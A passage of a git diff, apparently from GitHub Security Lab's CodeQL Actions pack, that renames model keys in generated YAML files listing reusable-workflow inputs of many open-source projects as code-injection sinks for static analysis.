b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index 7a79d4c1e092..ecac3f22f851 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index 55888f485510..ffc4193edbf1 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index ea453ec48112..93b29308ff27 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index 39005b693e71..c5965c5d8efc 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 4b4850831911..1fc5159e55a5 100644 
--- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index f45709cfa0f4..bce14a98edd5 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 1d8dc84c2f04..0439d6e1d4ce 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index f404aa73762f..357e11b3c0ba 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 2f546ce3f577..4d3ea1e91562 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 9e8b1e439939..44b905cab672 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 20a24a4ec7f0..192d975ea573 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 666a86caf881..627fca5d3ff2 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index d4926952f1ad..4d4fd0f229ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 144c16ff8de2..1ceacd2f1c0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index f97ee81bcb92..ba0f5c06a672 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 401875059ec5..3c8f11dd0cd8 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 6d6f9e177402..b7c00fff318d 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index a4b2b55262ff..5a129691bc5c 100644 
--- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index dd3bfe71b7b1..bd07156d06b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 2207feeec224..b029e3417102 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 2128369a7a95..995e692e4945 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index 57791c68c0ae..db325a06baa5 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 2a65a351255d..2c91ab62b0c8 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 53f6f6da728d..8fdf39a0bbcf 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 8ef924313a99..00fceb9c7bd2 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index 800c95ac1bfb..a6b947dfbce7 100644 
--- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 7a73bee6e57a..9359ea482c03 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 08d64944bd9a..023666e67ffb 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index d1097c47aeb0..7005b7dd7c91 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index 8d7fb64ad3ac..8b73f89401a7 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index d7790e533c94..3cf43b814db7 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 093ed8bcfd16..d33e308c7ebb 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 0ce99bc5fa9e..5c1de93f08af 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index 2767dfbec767..aab9fa502cb7 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index 2c5679329c13..b58fff831e11 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml index b3e26a1cf137..f96264fbf423 100644 
--- a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "input.success", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml index 963b64673a96..6aaf6aa27834 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "input.BACKEND_HOST", "code-injection", "generated"] - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "input.DEPLOYMENT_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml index fcf55466a9e1..d246f4ce6444 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.arch", "code-injection", "generated"] - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "input.tls", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml index 979bd414141d..a35a1a628e6b 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "input.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml index 55d810d29b53..ec22645570f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "input.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml index 19350db868c1..e0eccb26a54b 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.extraRunWindowsArgs", "code-injection", "generated"] - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml index 8d9af1a4e152..5f85bb1a91ab 100644 --- a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "input.yarn-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml index 47c09bf4f638..7f1af3242605 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.env", "code-injection", "generated"] - ["moby/buildkit/.github/workflows/.test.yml", "*", "input.includes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml index 4ff0273b47a6..b06b390e718f 100644 --- a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml 
